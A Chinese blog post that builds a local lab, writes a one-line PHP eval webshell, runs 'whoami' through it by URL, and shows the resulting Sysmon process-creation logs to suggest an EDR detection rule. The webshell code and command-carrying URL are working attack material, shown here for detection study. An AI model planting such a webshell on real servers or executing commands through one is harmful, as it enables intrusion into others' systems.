webshell后门中执行交互命令看到的sysmon数据采集和检测

下载phpstudy,链接:https://public.xp.cn/upgrades/phpStudy_64.zip,如下图启动wnmp。

 

 

webshell内容:

?
1
2
3
<?php echo "Your response is: ";?>
 
<?php @eval($_GET['cmd']);?>

写入C:\phpstudy_pro\WWW下的shell.php文件。

 

浏览器执行命令:

localhost/shell.php?cmd=system(%27whoami%27);

 

注意有一个;

然后界面返回:

 

 

看看sysmon的数据采集:有2条

 

 一条数据是关于system是启动cmd进程:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Process Create:
RuleName: -
UtcTime: 2022-04-26 08:20:16.986
ProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
ProcessId: 5512
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.19041.746 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: cmd.exe /c "whoami"
CurrentDirectory: C:\phpstudy_pro\WWW\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-6815-6267-e29f-050000000000}
LogonId: 0x59FE2
TerminalSessionId: 1
IntegrityLevel: High
Hashes: MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18
ParentProcessGuid: {0bf95bee-a686-6267-5407-000000000900}
ParentProcessId: 3952
ParentImage: C:\phpstudy_pro\Extensions\php\php7.3.4nts\php-cgi.exe
ParentCommandLine: ../Extensions/php/php7.3.4nts/php-cgi.exe
ParentUser: DESKTOP-92JS9SJ\bonel

 另外一条是cmd里启动whoami:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Process Create:
RuleName: -
UtcTime: 2022-04-26 08:20:17.010
ProcessGuid: {0bf95bee-ab41-6267-ac07-000000000900}
ProcessId: 4368
Image: C:\Windows\System32\whoami.exe
FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
Description: whoami - displays logged on user information
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: whoami.exe
CommandLine: whoami
CurrentDirectory: C:\phpstudy_pro\WWW\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-6815-6267-e29f-050000000000}
LogonId: 0x59FE2
TerminalSessionId: 1
IntegrityLevel: High
Hashes: MD5=A4A6924F3EAF97981323703D38FD99C4,SHA256=1D4902A04D99E8CCBFE7085E63155955FEE397449D386453F6C452AE407B8743,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
ParentProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
ParentProcessId: 5512
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: cmd.exe /c "whoami"
ParentUser: DESKTOP-92JS9SJ\bonel

 

因此,EDR里检测,应该就是检测parent(的partent)进程是否有whoami.

 

posted @   bonelee  阅读(190)  评论(0编辑  收藏  举报
相关博文:
· sysmon安装配置及其使用,EDR一些防御case肯定是要看的
· hh.exe 打开chm文件的sysmon数据采集
· 学习笔记-Sysmon
· ElderNode-博客中文翻译-七-
· WMI测试器
阅读排行:
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· DeepSeek 开源周回顾「GitHub 热点速览」
历史上的今天:
2018-04-26 Tensorflow深度学习之十二:基础图像处理之二
2018-04-26 tensorflow实现图像的翻转
2018-04-26 cnn handwrite使用原生的TensorFlow进行预测
点击右上角即可分享
微信分享提示